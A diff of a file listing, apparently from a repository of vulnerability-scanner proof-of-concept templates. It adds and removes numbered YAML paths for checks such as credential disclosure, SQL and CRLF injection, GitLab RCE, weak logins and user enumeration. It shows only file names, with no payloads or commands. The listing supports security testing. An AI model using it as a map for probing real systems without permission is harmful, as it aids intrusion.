./poc/exposed/putty-private-key-disclosure.yaml ./poc/exposed/pyproject-disclosure-9735.yaml ./poc/exposed/pyproject-disclosure-9736.yaml -./poc/exposed/pyproject-disclosure-9737.yaml +./poc/exposed/pyproject-disclosure-9738.yaml +./poc/exposed/pyproject-disclosure.yaml ./poc/exposed/qianxin-tianqing-info-disclosure.yaml ./poc/exposed/qihang-media-disclosure-9762.yaml ./poc/exposed/qihang-media-disclosure-9763.yaml @@ -45406,15 +45421,15 @@ ./poc/exposed/rabbitmq-config-exposure.yml ./poc/exposed/rails-routes-exposed.yaml ./poc/exposed/rails-secret-token-disclosure-9808.yaml -./poc/exposed/rails-secret-token-disclosure-9809.yaml +./poc/exposed/rails-secret-token-disclosure-9810.yaml ./poc/exposed/rails-secret-token-disclosure.yaml ./poc/exposed/razorpay-clientid-disclosure.yaml ./poc/exposed/redis-commander-exposure-9851.yaml ./poc/exposed/redis-commander-exposure.yaml ./poc/exposed/redis-config-exposure.yaml ./poc/exposed/request-baskets-exposure.yaml +./poc/exposed/rocketmq-console-exposure-9892.yaml ./poc/exposed/rocketmq-console-exposure-9893.yaml -./poc/exposed/rocketmq-console-exposure-9894.yaml ./poc/exposed/rocketmq-console-exposure.yaml ./poc/exposed/roundcube-log-disclosure-1.yaml ./poc/exposed/roundcube-log-disclosure-2.yaml @@ -45436,7 +45451,7 @@ ./poc/exposed/seeyon-a6-createmysql-disclosure.yaml ./poc/exposed/seeyon-a8-info-disclosure.yaml ./poc/exposed/seeyon-oa-session-information-disclosure.yaml -./poc/exposed/selenium-exposure-10138.yaml +./poc/exposed/selenium-exposure-10137.yaml ./poc/exposed/selenium-exposure.yaml ./poc/exposed/selenoid-ui-exposure-10139.yaml ./poc/exposed/selenoid-ui-exposure.yaml @@ -45449,7 +45464,7 @@ ./poc/exposed/sensitive-storage-data-exposure-5.yaml ./poc/exposed/sensitive-storage-data-exposure-6.yaml ./poc/exposed/sensitive-storage-exposure-1.yaml -./poc/exposed/sensitive-storage-exposure-10143.yaml +./poc/exposed/sensitive-storage-exposure-10144.yaml ./poc/exposed/sensitive-storage-exposure-2.yaml ./poc/exposed/sensitive-storage-exposure-3.yaml ./poc/exposed/sensitive-storage-exposure-4.yaml @@ -45461,7 +45476,6 @@ ./poc/exposed/service-now-exposed.yaml ./poc/exposed/setup-page-exposure-1.yaml ./poc/exposed/setup-page-exposure-10180.yaml -./poc/exposed/setup-page-exposure-10181.yaml ./poc/exposed/setup-page-exposure-2.yaml ./poc/exposed/setup-page-exposure-3.yaml ./poc/exposed/setup-page-exposure-4.yaml @@ -45471,9 +45485,9 @@ ./poc/exposed/sftp-credentials-exposure-2.yaml ./poc/exposed/smf-path-disclosure.yaml ./poc/exposed/snyk-ignore-file-disclosure-10346.yaml -./poc/exposed/snyk-ignore-file-disclosure-10348.yaml +./poc/exposed/snyk-ignore-file-disclosure-10347.yaml ./poc/exposed/snyk-ignore-file-disclosure-10349.yaml -./poc/exposed/solr-exposure-10363.yaml +./poc/exposed/solr-exposure-10364.yaml ./poc/exposed/solr-exposure-10365.yaml ./poc/exposed/solr-exposure-10366.yaml ./poc/exposed/solr-exposure.yaml @@ -45490,12 +45504,13 @@ ./poc/exposed/system-properties-exposure.yaml ./poc/exposed/template_klr300n-exposure.yaml ./poc/exposed/thinkphp-509-information-disclosure-10752.yaml +./poc/exposed/thinkphp-509-information-disclosure-10753.yaml ./poc/exposed/thinkphp-509-information-disclosure-10754.yaml ./poc/exposed/thinkphp-509-information-disclosure-10755.yaml ./poc/exposed/thinkphp-509-information-disclosure.yaml ./poc/exposed/thumbs-db-disclosure-10760.yaml +./poc/exposed/thumbs-db-disclosure-10761.yaml ./poc/exposed/thumbs-db-disclosure-10762.yaml -./poc/exposed/thumbs-db-disclosure-10763.yaml ./poc/exposed/titannit-web-exposure.yaml ./poc/exposed/tomcat-cookie-exposed.yaml ./poc/exposed/tomcat-exposed-docs.yaml @@ -45510,6 +45525,7 @@ ./poc/exposed/tugboat-config-exposure-10841.yaml ./poc/exposed/tugboat-config-exposure-10842.yaml ./poc/exposed/tugboat-config-exposure-10843.yaml +./poc/exposed/tugboat-config-exposure-10844.yaml ./poc/exposed/typea-ftc-disclosure-76c6b84ccd9f6bd60eada03675ff7bce.yaml ./poc/exposed/typea-ftc-disclosure-b7c5fef4e19b4435bd19c7ddc442fdea.yaml ./poc/exposed/typea-ftc-disclosure.yaml @@ -45521,15 +45537,14 @@ ./poc/exposed/wallet-recovery-phrase-disclosure.yml ./poc/exposed/watchguard-credentials-disclosure-11105.yaml ./poc/exposed/watchguard-credentials-disclosure-11106.yaml -./poc/exposed/watchguard-credentials-disclosure.yaml ./poc/exposed/weaver_e_cology9_Information_disclosure.yaml ./poc/exposed/webmin-config-exposure.yml ./poc/exposed/wordpress-config-disclosure.yaml ./poc/exposed/wordpress-path-disclosure.yaml ./poc/exposed/wordpress-sensitive-config.yaml ./poc/exposed/wordpress-wp-config-exposure.yml -./poc/exposed/wordpress-wpcourses-info-disclosure-11367.yaml ./poc/exposed/wordpress-wpcourses-info-disclosure-11368.yaml +./poc/exposed/wordpress-wpcourses-info-disclosure-11369.yaml ./poc/exposed/wordpress-wpcourses-info-disclosure-11370.yaml ./poc/exposed/wordpress-wpcourses-info-disclosure-11371.yaml ./poc/exposed/wordpress-wpcourses-info-disclosure.yaml @@ -45541,8 +45556,8 @@ ./poc/exposed/wp-affiliate-disclosure-b7c5fef4e19b4435bd19c7ddc442fdea.yaml ./poc/exposed/wp-affiliate-disclosure.yaml ./poc/exposed/wp-config.php-disclosure.yaml -./poc/exposed/wp-full-path-disclosure-11455.yaml ./poc/exposed/wp-full-path-disclosure-11456.yaml +./poc/exposed/wp-full-path-disclosure-11457.yaml ./poc/exposed/wp-full-path-disclosure.yaml ./poc/exposed/wp-mailchimp-log-exposure-11492.yaml ./poc/exposed/wp-mailchimp-log-exposure-11493.yaml @@ -45550,8 +45565,8 @@ ./poc/exposed/wpeprivate-config-disclosure.yaml ./poc/exposed/wpsensitiveinfo.yaml ./poc/exposed/x5engine-full-path-disclosure.yaml -./poc/exposed/yarn-manager-exposure-11731.yaml ./poc/exposed/yarn-manager-exposure-11732.yaml +./poc/exposed/yarn-manager-exposure-11733.yaml ./poc/exposed/yarn-manager-exposure.yaml ./poc/exposed/yonyou-nc-wsncapplet-disclosure.yaml ./poc/exposed/yyoa-a6-userinfo-disclosure.yaml @@ -45579,7 +45594,6 @@ ./poc/extract/extract-firebase-database.yaml ./poc/extract/extract-urls-7368.yaml ./poc/extract/extract-urls-7369.yaml -./poc/extract/extract-urls-7370.yaml ./poc/extract/extract-urls.yaml ./poc/extract/extract.yaml ./poc/extract/extractor-bitcoin.yaml @@ -45617,6 +45631,7 @@ ./poc/favicon/favicon-detect.yaml ./poc/favicon/favicon-detection-7441.yaml ./poc/favicon/favicon-detection-7442.yaml +./poc/favicon/favicon-detection-7443.yaml ./poc/favicon/favicon-detection-7445.yaml ./poc/favicon/favicon-detection-7446.yaml ./poc/favicon/favicon-detection.yaml @@ -45637,8 +45652,8 @@ ./poc/ftp/crush-ftp-detect-1271.yaml ./poc/ftp/crush-ftp-detect-1272.yaml ./poc/ftp/crush-ftp-detect.yaml -./poc/ftp/crush-ftp-login-1273.yaml ./poc/ftp/crush-ftp-login-1274.yaml +./poc/ftp/crush-ftp-login-1275.yaml ./poc/ftp/crush-ftp-login.yaml ./poc/ftp/dahua-smart-park-deleteftp-rce.yaml ./poc/ftp/dionaea-ftp-honeypot-detection.yaml @@ -45646,14 +45661,13 @@ ./poc/ftp/ftp-access.yaml ./poc/ftp/ftp-anonymous-login.yaml ./poc/ftp/ftp-credentials-exposure-7567.yaml -./poc/ftp/ftp-credentials-exposure-7568.yaml +./poc/ftp/ftp-credentials-exposure.yaml ./poc/ftp/ftp-default-credentials.yaml -./poc/ftp/ftp-default-creds.yaml ./poc/ftp/ftp-weak-credentials-7569.yaml ./poc/ftp/ftp-weak-credentials-7570.yaml ./poc/ftp/ftp-weak-credentials.yaml -./poc/ftp/ftpconfig-7565.yaml ./poc/ftp/ftpconfig-7566.yaml +./poc/ftp/ftpconfig.yaml ./poc/ftp/mainwp-updraftplus-extension-32da2ccdaaac8b19165da0cc67dc1c8d.yaml ./poc/ftp/mainwp-updraftplus-extension-3642dbf393631c48d93989f2e01cf01e.yaml ./poc/ftp/mainwp-updraftplus-extension-3f55e7d43f06ab4ff2d01d3e625f48fc.yaml @@ -45696,7 +45710,7 @@ ./poc/ftp/net2ftp.yaml ./poc/ftp/nowayer-ftp.yaml ./poc/ftp/proftpd-config-9666.yaml -./poc/ftp/proftpd-config.yaml +./poc/ftp/proftpd-config-9667.yaml ./poc/ftp/serv-u-ftp.yaml ./poc/ftp/sftp-config-exposure.yaml ./poc/ftp/sftp-config.yaml @@ -45747,7 +45761,6 @@ ./poc/ftp/vsftpd-detection-11073.yaml ./poc/ftp/vsftpd-detection-11074.yaml ./poc/ftp/vsftpd-detection-11075.yaml -./poc/ftp/vsftpd-detection-11076.yaml ./poc/ftp/vsftpd-detection.yaml ./poc/ftp/wanhu-ezoffice-download-ftp-jsp-filedownload.yaml ./poc/ftp/wanhu-oa-download-ftp-file-read.yaml @@ -45765,7 +45778,6 @@ ./poc/ftp/ws_ftp-server-web-transfer.yaml ./poc/ftp/ws_ftp-ssh-detect.yaml ./poc/fuzz/0xlfifuzz.yaml -./poc/fuzz/0xlfifuzz1.yaml ./poc/fuzz/adminer-panel-fuzz-71.yaml ./poc/fuzz/adminer-panel-fuzz-72.yaml ./poc/fuzz/adminer-panel-fuzz-73.yaml @@ -45774,8 +45786,8 @@ ./poc/fuzz/alfabet-param-fuzzer.yaml ./poc/fuzz/blind_xss_fuzz_param.yaml ./poc/fuzz/cache-poisoning-fuzz.yaml +./poc/fuzz/fuzz-mode.yaml ./poc/fuzz/fuzz-oauth.yaml -./poc/fuzz/fuzz-query.yaml ./poc/fuzz/fuzz-type.yaml ./poc/fuzz/fuzz-xxe.yaml ./poc/fuzz/fuzzing-xss-get-params-html-attribute-injection.yaml @@ -45787,7 +45799,9 @@ ./poc/fuzz/generic-lfi-fuzzing.yaml ./poc/fuzz/get_fuzzing.yaml ./poc/fuzz/lfi-fuzz.yaml +./poc/fuzz/lfi-linux-fuzz.yaml ./poc/fuzz/linux-lfi-fuzz.yaml +./poc/fuzz/linux-lfi-fuzzing.yaml ./poc/fuzz/log4j-fuzz-head-poc-v1.yaml ./poc/fuzz/log4j-fuzz-head-poc-v2.yaml ./poc/fuzz/log4j-fuzz-head-poc.yaml @@ -45818,7 +45832,7 @@ ./poc/gcloud/gcp-bucket-enum.yaml ./poc/gcloud/gcp-firebase-app-enum.yaml ./poc/gcloud/gcp-firebase-rtdb-enum.yaml -./poc/gcloud/gcp-service-account-11851.yaml +./poc/gcloud/gcp-service-account-7575.yaml ./poc/gcloud/gcp-service-account.yaml ./poc/gcloud/nktagcloud-a8e6501893b16cbc2185c791f71d5631.yaml ./poc/gcloud/nktagcloud.yaml @@ -45842,11 +45856,10 @@ ./poc/git/apabi-digital-resource-platform.yaml ./poc/git/api-github-429.yaml ./poc/git/api-gitlab-431.yaml -./poc/git/api-gitlab.yaml +./poc/git/api-gitlab.yml ./poc/git/axiom-digitalocean-key-exposure-665.yaml -./poc/git/axiom-digitalocean-key-exposure-666.yaml ./poc/git/axiom-digitalocean-key-exposure-667.yaml -./poc/git/axiom-digitalocean-key-exposure.yaml +./poc/git/axiom-digitalocean-key-exposure-668.yaml ./poc/git/cgit.yaml ./poc/git/custom-dot-git-detect.yaml ./poc/git/digital-agency-lite-1d0d069f8e40de9d56d2bab8f8887bf2.yaml @@ -45890,7 +45903,6 @@ ./poc/git/digitalrebar-provision-ui.yaml ./poc/git/digitalrebar-traversal-6996.yaml ./poc/git/digitalrebar-traversal-6997.yaml -./poc/git/digitalrebar-traversal.yaml ./poc/git/digits-9b6730e2c3d90bc9ed956d88efa939c8.yaml ./poc/git/digits.yaml ./poc/git/easy-digital-downloads-042823f4bd6aef84b6a022bbda290558.yaml @@ -45944,15 +45956,14 @@ ./poc/git/exposed-gitignore-7302.yaml ./poc/git/exposed-gitignore-7303.yaml ./poc/git/exposed-gitignore-7304.yaml -./poc/git/exposed-gitignore-7305.yaml ./poc/git/exposed-gitignore-7306.yaml ./poc/git/exposed-gitlab-ci-config.yaml ./poc/git/exposed-gits.yaml -./poc/git/git-config-7633.yaml ./poc/git/git-config-7634.yaml ./poc/git/git-config-7635.yaml ./poc/git/git-config-7636.yaml ./poc/git/git-config-7637.yaml +./poc/git/git-config-7638.yaml ./poc/git/git-config-crendentials.yaml ./poc/git/git-config-exposure.yaml ./poc/git/git-config-nginxoffbyslash-1.yaml @@ -45962,6 +45973,7 @@ ./poc/git/git-config-nginxoffbyslash-5.yaml ./poc/git/git-config-nginxoffbyslash-6.yaml ./poc/git/git-config-nginxoffbyslash-7.yaml +./poc/git/git-config-nginxoffbyslash-7628.yaml ./poc/git/git-config-nginxoffbyslash-7629.yaml ./poc/git/git-config-nginxoffbyslash-7630.yaml ./poc/git/git-config-nginxoffbyslash-7631.yaml @@ -45970,7 +45982,7 @@ ./poc/git/git-config-nginxoffbyslash-9.yaml ./poc/git/git-config-nginxoffbyslash.yaml ./poc/git/git-config.yaml -./poc/git/git-credentials-7643.yaml +./poc/git/git-credentials-7644.yaml ./poc/git/git-credentials-disclosure-7639.yaml ./poc/git/git-credentials-disclosure-7640.yaml ./poc/git/git-credentials-disclosure-7642.yaml @@ -46009,20 +46021,17 @@ ./poc/git/github-app-token.yaml ./poc/git/github-enterprise-detect-7647.yaml ./poc/git/github-enterprise-detect-7648.yaml -./poc/git/github-enterprise-detect-7649.yaml ./poc/git/github-enterprise-detect-7650.yaml ./poc/git/github-enterprise-detect-7651.yaml ./poc/git/github-enterprise-detect.yaml ./poc/git/github-gemfile-files-1.yaml ./poc/git/github-gemfile-files-2.yaml -./poc/git/github-gemfile-files-7652.yaml -./poc/git/github-gemfile-files-7653.yaml +./poc/git/github-gemfile-files.yaml ./poc/git/github-login-check.yaml ./poc/git/github-oauth-token.yaml ./poc/git/github-outdated-key.yaml ./poc/git/github-page-config-7655.yaml ./poc/git/github-page-config-7656.yaml -./poc/git/github-page-config.yaml ./poc/git/github-personal-token.yaml ./poc/git/github-phish.yaml ./poc/git/github-recovery-code.yaml @@ -46053,13 +46062,14 @@ ./poc/git/github-workflows-disclosure-5.yaml ./poc/git/github-workflows-disclosure-6.yaml ./poc/git/github-workflows-disclosure-7.yaml -./poc/git/github-workflows-disclosure-7664.yaml +./poc/git/github-workflows-disclosure-7665.yaml ./poc/git/github-workflows-disclosure-7666.yaml ./poc/git/github-workflows-disclosure-8.yaml ./poc/git/github-workflows-disclosure-9.yaml ./poc/git/github-workflows-disclosure.yaml ./poc/git/github-workflows-push.yaml ./poc/git/gitlab-api-user-enum-7667.yaml +./poc/git/gitlab-api-user-enum-7668.yaml ./poc/git/gitlab-api-user-enum-7669.yaml ./poc/git/gitlab-api-user-enum.yaml ./poc/git/gitlab-ci.yaml @@ -46077,38 +46087,37 @@ ./poc/git/gitlab-personal-accesstoken.yaml ./poc/git/gitlab-pipeline-triggertoken.yaml ./poc/git/gitlab-public-registration.yaml -./poc/git/gitlab-public-repos-7675.yaml ./poc/git/gitlab-public-repos-7676.yaml ./poc/git/gitlab-public-repos-7677.yaml ./poc/git/gitlab-public-repos-7678.yaml ./poc/git/gitlab-public-repos-7679.yaml ./poc/git/gitlab-public-repos-7680.yaml +./poc/git/gitlab-public-signup-7681.yaml ./poc/git/gitlab-public-signup-7682.yaml ./poc/git/gitlab-public-signup-7683.yaml ./poc/git/gitlab-public-signup-7684.yaml ./poc/git/gitlab-public-signup.yaml ./poc/git/gitlab-public-snippets-1.yaml ./poc/git/gitlab-public-snippets-2.yaml +./poc/git/gitlab-public-snippets-7685.yaml ./poc/git/gitlab-public-snippets-7686.yaml ./poc/git/gitlab-public-snippets-7687.yaml ./poc/git/gitlab-public-snippets-7688.yaml ./poc/git/gitlab-public-snippets-7689.yaml -./poc/git/gitlab-public-snippets-7690.yaml -./poc/git/gitlab-public-snippets.yaml ./poc/git/gitlab-rce-7691.yaml ./poc/git/gitlab-rce-7692.yaml ./poc/git/gitlab-rce-7693.yaml +./poc/git/gitlab-rce.yaml ./poc/git/gitlab-runner-regtoken.yaml ./poc/git/gitlab-snippets.yaml ./poc/git/gitlab-ssrf-cve-2021-22214.yml ./poc/git/gitlab-uninitialized-password-7694.yaml ./poc/git/gitlab-uninitialized-password-7695.yaml ./poc/git/gitlab-user-enum-7699.yaml -./poc/git/gitlab-user-enum-7700.yaml ./poc/git/gitlab-user-enum-7701.yaml ./poc/git/gitlab-user-enum.yaml ./poc/git/gitlab-user-enumeration-7696.yaml -./poc/git/gitlab-user-enumeration-7697.yaml +./poc/git/gitlab-user-enumeration-7698.yaml ./poc/git/gitlab-user-enumeration.yaml ./poc/git/gitlab-user-open-api-7702.yaml ./poc/git/gitlab-user-open-api-7703.yaml @@ -46119,6 +46128,7 @@ ./poc/git/gitlab-weak-login-3.yaml ./poc/git/gitlab-weak-login-4.yaml ./poc/git/gitlab-weak-login-7704.yaml +./poc/git/gitlab-weak-login-7705.yaml ./poc/git/gitlab-weak-login-7706.yaml ./poc/git/gitlab-weak-login-7707.yaml ./poc/git/gitlab-workflow-7708.yaml @@ -46138,7 +46148,6 @@ ./poc/git/logitech-harmony-portal.yaml ./poc/git/metadata-digitalocean-8816.yaml ./poc/git/metadata-digitalocean-8817.yaml -./poc/git/metadata-digitalocean-8818.yaml ./poc/git/setup-github-enterprise.yaml ./poc/git/u-reader-digital-library.yaml ./poc/git/woo-checkout-for-digital-goods-6477bf18cad6c823db485408d49b337b.yaml @@ -46287,7 +46296,6 @@ ./poc/google/google-analytics-premium.yaml ./poc/google/google-analytics-top-posts-widget-cb54e4843123dfb1f03fa4c29d51e0c9.yaml ./poc/google/google-analytics-top-posts-widget.yaml -./poc/google/google-api-7771.yaml ./poc/google/google-api-7772.yaml ./poc/google/google-api-key-7767.yaml ./poc/google/google-api-key-7768.yaml @@ -46308,6 +46316,7 @@ ./poc/google/google-bucket-service-7774.yaml ./poc/google/google-bucket-service-7775.yaml ./poc/google/google-bucket-service-7776.yaml +./poc/google/google-bucket-service.yaml ./poc/google/google-bucket.yaml ./poc/google/google-calendar-events-68978f3e374cb6c26b2b367d579cf1b9.yaml ./poc/google/google-calendar-events-6fb70034444d4736260c193a93a52c53.yaml @@ -46341,9 +46350,9 @@ ./poc/google/google-document-embedder.yaml ./poc/google/google-earth-dlogin-7778.yaml ./poc/google/google-earth-dlogin-7779.yaml +./poc/google/google-earth-dlogin-7780.yaml ./poc/google/google-earth-dlogin-7781.yaml ./poc/google/google-earth-dlogin-7782.yaml -./poc/google/google-earth-dlogin.yaml ./poc/google/google-earthenterprise-weak-password.yaml ./poc/google/google-floc-disabled-7783.yaml ./poc/google/google-floc-disabled-7785.yaml @@ -46448,6 +46457,7 @@ ./poc/google/google-pagespeed-insights.yaml ./poc/google/google-phish.yaml ./poc/google/google-safebrowsing.yaml +./poc/google/google-secrets.yaml ./poc/google/google-seo-author-snippets-c7ef7a54325272053bde6fd4c9883ada.yaml ./poc/google/google-seo-author-snippets-ce873f3e8d7877eb7cdc80ae1da6d769.yaml ./poc/google/google-seo-author-snippets-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -46483,7 +46493,6 @@ ./poc/google/google-storage-7790.yaml ./poc/google/google-storage-7791.yaml ./poc/google/google-storage-bucket.yaml -./poc/google/google-storage.yaml ./poc/google/google-talk-chatback.yaml ./poc/google/google-typography-5d5e64882eab8f2ab1996d1df039c737.yaml ./poc/google/google-typography.yaml @@ -46843,16 +46852,15 @@ ./poc/graphql/graphql-ariadne-detect.yaml ./poc/graphql/graphql-array-batching-7827.yaml ./poc/graphql/graphql-array-batching-7828.yaml +./poc/graphql/graphql-array-batching.yaml ./poc/graphql/graphql-depth-limit.yaml ./poc/graphql/graphql-detect-7829.yaml ./poc/graphql/graphql-detect-7830.yaml -./poc/graphql/graphql-detect-7831.yaml ./poc/graphql/graphql-detect-7832.yaml ./poc/graphql/graphql-detect.yaml ./poc/graphql/graphql-dianajl-detect.yaml ./poc/graphql/graphql-field-suggestion-7833.yaml ./poc/graphql/graphql-field-suggestion-7834.yaml -./poc/graphql/graphql-field-suggestion.yaml ./poc/graphql/graphql-flutter-detect.yaml ./poc/graphql/graphql-get-method-7835.yaml ./poc/graphql/graphql-get-method-7836.yaml @@ -46876,10 +46884,9 @@ ./poc/graphql/hasura-graphql-psql-exec-7899.yaml ./poc/graphql/hasura-graphql-psql-exec-7900.yaml ./poc/graphql/hasura-graphql-psql-exec-7901.yaml -./poc/graphql/hasura-graphql-psql-exec-7902.yaml +./poc/graphql/hasura-graphql-psql-exec.yaml ./poc/graphql/hasura-graphql-ssrf-7903.yaml ./poc/graphql/hasura-graphql-ssrf-7904.yaml -./poc/graphql/hasura-graphql-ssrf-7905.yaml ./poc/graphql/hasura-graphql-ssrf-7906.yaml ./poc/graphql/hasura-graphql-ssrf.yaml ./poc/graphql/hidden-graphql-endpoint-discovery.yaml @@ -46983,7 +46990,6 @@ ./poc/header/hidden-data-in-headers.yaml ./poc/header/hidden-http-header-injection.yaml ./poc/header/host-header-auth-bypass.yaml -./poc/header/host-header-injection-8000.yaml ./poc/header/host-header-injection-8002.yaml ./poc/header/host-header-injection.yaml ./poc/header/host-header-poisoning.yaml @@ -46998,19 +47004,19 @@ ./poc/header/http-headers.yaml ./poc/header/http-hsts-header.yaml ./poc/header/http-missing-security-headers-8058.yaml +./poc/header/http-missing-security-headers.yaml ./poc/header/insert-headers-and-footers-07e3cd9581f59ebebf0ea2afde0b3b69.yaml ./poc/header/insert-headers-and-footers-7d5f28d00d66d203ff5a11666d3be6e5.yaml ./poc/header/insert-headers-and-footers-88eed07c6e0a2925ad63426ba88d1539.yaml ./poc/header/insert-headers-and-footers.yaml ./poc/header/jenkins-headers-detect.yaml ./poc/header/jfrog-version-header.yaml -./poc/header/log4j-all-headers.yaml ./poc/header/maxforwards-headers-detect.yaml ./poc/header/missing-hsts-header.yaml ./poc/header/null-auth-header-auth-bypass.yaml ./poc/header/oob-header-based-interaction-9248.yaml ./poc/header/oob-header-based-interaction-9249.yaml -./poc/header/oob-header-based-interaction.yaml +./poc/header/oob-header-based-interaction-9250.yaml ./poc/header/pearl-header-builder-2ad1e0994a7bb85ac431ac6afa84db60.yaml ./poc/header/pearl-header-builder-a51f1388039630606710e61f15390639.yaml ./poc/header/pearl-header-builder.yaml @@ -47021,7 +47027,6 @@ ./poc/header/splash-header.yaml ./poc/header/sqli_header-10504.yaml ./poc/header/sqli_header.yaml -./poc/header/sqliheader.yaml ./poc/header/sticky-header-effects-for-elementor.yaml ./poc/header/sticky-header-oceanwp-02e9736f770146a29a8a74974b2d08bf.yaml ./poc/header/sticky-header-oceanwp.yaml @@ -47092,25 +47097,25 @@ ./poc/http/http-https-remover-7c0d4499231fc232e325bb27484b40b7.yaml ./poc/http/http-https-remover.yaml ./poc/http/http-missing-security-headers-8058.yaml +./poc/http/http-missing-security-headers.yaml ./poc/http/http-multiple-matcher-condition.yaml ./poc/http/http-multiple-matcher.yaml ./poc/http/http-paths.yaml -./poc/http/http-raw.yaml +./poc/http/http-raw-multiple.yaml ./poc/http/http-trace.yaml ./poc/http/http-username-password.yaml ./poc/http/http-value-share-template-1.yaml -./poc/http/http-value-share-template-2.yaml ./poc/http/http-verb-tampering.yaml ./poc/http/httpbin-detection.yaml ./poc/http/httpbin-detection.yml +./poc/http/httpbin-open-redirect-8047.yaml ./poc/http/httpbin-open-redirect-8048.yaml ./poc/http/httpbin-open-redirect-8049.yaml -./poc/http/httpbin-open-redirect.yaml ./poc/http/httpbin-open-redirect.yml ./poc/http/httpbin-panel-8051.yaml ./poc/http/httpbin-panel.yaml -./poc/http/httpbin-xss-8052.yaml ./poc/http/httpbin-xss-8053.yaml +./poc/http/httpbin-xss.yaml ./poc/http/httpbin-xss.yml ./poc/http/httpd-config-8054.yaml ./poc/http/httpd-config.yaml @@ -47123,10 +47128,8 @@ ./poc/http/ibm-http-server-8095.yaml ./poc/http/ibm-http-server-8096.yaml ./poc/http/ibm-http-server-8097.yaml -./poc/http/ibm-http-server.yaml ./poc/http/iis-enum-httpapi.yaml ./poc/http/knopflerfish-http-server.yaml -./poc/http/lighttpd-default-8627.yaml ./poc/http/lighttpd-default-8628.yaml ./poc/http/lighttpd-default.yaml ./poc/http/lighttpd.yaml @@ -47150,7 +47153,6 @@ ./poc/http/springboot-httptrace-1.yaml ./poc/http/springboot-httptrace-10466.yaml ./poc/http/springboot-httptrace-10467.yaml -./poc/http/springboot-httptrace-10468.yaml ./poc/http/springboot-httptrace-10469.yaml ./poc/http/springboot-httptrace-2.yaml ./poc/http/ssl-atlas-free-ssl-certificate-https-redirect-24a5e6e71d2e98ce73b85cf4a837e007.yaml @@ -47171,6 +47173,7 @@ ./poc/ibm/default-ibm-http-server.yaml ./poc/ibm/ibm-advanced-system-management-8088.yaml ./poc/ibm/ibm-advanced-system-management-8089.yaml +./poc/ibm/ibm-advanced-system-management-8090.yaml ./poc/ibm/ibm-advanced-system-management-8091.yaml ./poc/ibm/ibm-advanced-system-management.yaml ./poc/ibm/ibm-app-connect-login.yaml @@ -47200,7 +47203,6 @@ ./poc/ibm/ibm-http-server-8095.yaml ./poc/ibm/ibm-http-server-8096.yaml ./poc/ibm/ibm-http-server-8097.yaml -./poc/ibm/ibm-http-server.yaml ./poc/ibm/ibm-imm.yaml ./poc/ibm/ibm-infoprint-directory-traversal-8098.yaml ./poc/ibm/ibm-infoprint-directory-traversal-8099.yaml @@ -47218,13 +47220,13 @@ ./poc/ibm/ibm-maximo-login.yaml ./poc/ibm/ibm-maximo-panel.yaml ./poc/ibm/ibm-merge-pacs.yaml -./poc/ibm/ibm-mqseries-default-login-8107.yaml +./poc/ibm/ibm-mqseries-default-login-8106.yaml ./poc/ibm/ibm-mqseries-default-login-8108.yaml ./poc/ibm/ibm-mqseries-web-console.yaml ./poc/ibm/ibm-mqseries.yaml ./poc/ibm/ibm-note-login-1.yaml ./poc/ibm/ibm-note-login-2.yaml -./poc/ibm/ibm-note-login-8110.yaml +./poc/ibm/ibm-note-login-8111.yaml ./poc/ibm/ibm-note-login-8112.yaml ./poc/ibm/ibm-note-login.yaml ./poc/ibm/ibm-odm-detect.yaml @@ -47234,7 +47236,6 @@ ./poc/ibm/ibm-security-access-manager-8114.yaml ./poc/ibm/ibm-security-access-manager-8115.yaml ./poc/ibm/ibm-security-access-manager.yaml -./poc/ibm/ibm-service-assistant-8116.yaml ./poc/ibm/ibm-service-assistant-8117.yaml ./poc/ibm/ibm-service-assistant-8118.yaml ./poc/ibm/ibm-service-assistant.yaml @@ -47281,9 +47282,8 @@ ./poc/injection/beescms_v3-login-sql-injection.yaml ./poc/injection/biometric-data-injection-registration.yaml ./poc/injection/biometric-data-injection.yaml -./poc/injection/buffalo-config-injection-798.yaml ./poc/injection/buffalo-config-injection-799.yaml -./poc/injection/buffalo-config-injection-800.yaml +./poc/injection/buffalo-config-injection-801.yaml ./poc/injection/buffalo-config-injection.yaml ./poc/injection/chanjet-crm-get-usedspace-sql-injection.yaml ./poc/injection/cmseasy-crossall-act-php-sql-injection.yaml @@ -47294,8 +47294,8 @@ ./poc/injection/content_injection.yaml ./poc/injection/cookie-injection.yaml ./poc/injection/crlf-injection-1.yaml -./poc/injection/crlf-injection-1260.yaml ./poc/injection/crlf-injection-1261.yaml +./poc/injection/crlf-injection-1262.yaml ./poc/injection/crlf-injection-1263.yaml ./poc/injection/crlf-injection-1264.yaml ./poc/injection/crlf-injection-1265.yaml @@ -47320,12 +47320,12 @@ ./poc/injection/drupal_module-phonefield-sql-injection.yaml ./poc/injection/drupal_module-services-sql-injection.yaml ./poc/injection/drupal_module-social-sql-injection.yaml +./poc/injection/duomicms-sql-injection-7122.yaml ./poc/injection/duomicms-sql-injection-7123.yaml ./poc/injection/duomicms-sql-injection-7124.yaml ./poc/injection/duomicms-sql-injection-7125.yaml ./poc/injection/error-based-get-sql-injection.yaml ./poc/injection/error-based-post-sql-injection.yaml -./poc/injection/error-based-sql-injection-7249.yaml ./poc/injection/error-based-sql-injection-7250.yaml ./poc/injection/error-based-sql-injection.yaml ./poc/injection/export-job-portal-management-system-sql-injection.yaml @@ -47334,6 +47334,7 @@ ./poc/injection/fuzzing-xss-get-params-html-injection.yaml ./poc/injection/fuzzing-xss-get-params-javascript-context-injection.yaml ./poc/injection/fuzzing-xss-get-params-javascript-schema-url-injection.yaml +./poc/injection/glpi-9.3.3-sql-injection.yaml ./poc/injection/header-blind-sql-injection.yaml ./poc/injection/header-blind-time-sql-injection.yaml ./poc/injection/header-command-injection-7917.yaml @@ -47344,7 +47345,7 @@ ./poc/injection/hidden-command-injection.yaml ./poc/injection/hidden-http-header-injection.yaml ./poc/injection/hidden-ldap-injection.yaml -./poc/injection/host-header-injection-8000.yaml +./poc/injection/host-header-injection-8002.yaml ./poc/injection/host-header-injection.yaml ./poc/injection/injection-guard-4875992ccc89ab6c03d9298f0ea07338.yaml ./poc/injection/injection-guard-4a32f73a586451a52bc0604215b90d03.yaml @@ -47378,6 +47379,7 @@ ./poc/injection/simple-crm-sql-injection-10275.yaml ./poc/injection/simple-crm-sql-injection-10276.yaml ./poc/injection/simple-crm-sql-injection-10277.yaml +./poc/injection/simple-crm-sql-injection-10278.yaml ./poc/injection/site-map-sql-injection.yaml ./poc/injection/sql-injection.yaml ./poc/injection/ssrf-injection.yaml @@ -47393,7 +47395,6 @@ ./poc/injection/viewlinc-crlf-injection-11011.yaml 